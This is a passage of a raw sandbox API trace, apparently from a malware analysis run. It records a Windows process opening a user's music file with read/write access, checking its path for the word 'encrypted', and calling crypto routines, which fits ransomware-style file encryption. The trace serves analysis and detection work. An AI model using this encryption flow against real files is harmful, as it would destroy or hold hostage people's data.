hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.497] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c760 [0037.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c760, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.497] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6vvyzvepp1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.498] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.498] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.498] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.498] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.498] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0037.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8898e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.499] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.499] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.499] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.499] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.499] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.499] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.499] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.499] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.499] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.499] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0xe0ac2d80, ftLastWriteTime.dwHighDateTime=0x1d5b812, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 0x7c20c0 [0037.500] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.500] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0xe0ac2d80, ftLastWriteTime.dwHighDateTime=0x1d5b812, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 0x7c20c0 [0037.500] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vYzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YzvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zvePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePP1.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.501] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.501] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.502] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.502] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.502] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.502] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6VvYzvePP1.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ecded0, ftCreationTime.dwHighDateTime=0x1d5b6a5, ftLastAccessTime.dwLowDateTime=0xe0ac2d80, ftLastAccessTime.dwHighDateTime=0x1d5b812, ftLastWriteTime.dwLowDateTime=0xe0ac2d80, ftLastWriteTime.dwHighDateTime=0x1d5b812, nFileSizeHigh=0x0, nFileSizeLow=0x275a, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="6VvYzvePP1.m4a", cAlternateFileName="6VVYZV~1.M4A")) returned 0x7c2100 [0037.502] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.502] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.502] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.502] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.502] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.502] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.503] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.503] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.503] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.503] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.503] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.503] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.503] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.504] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.505] PeekMessageW (in: lpMsg=0x6aeb14, 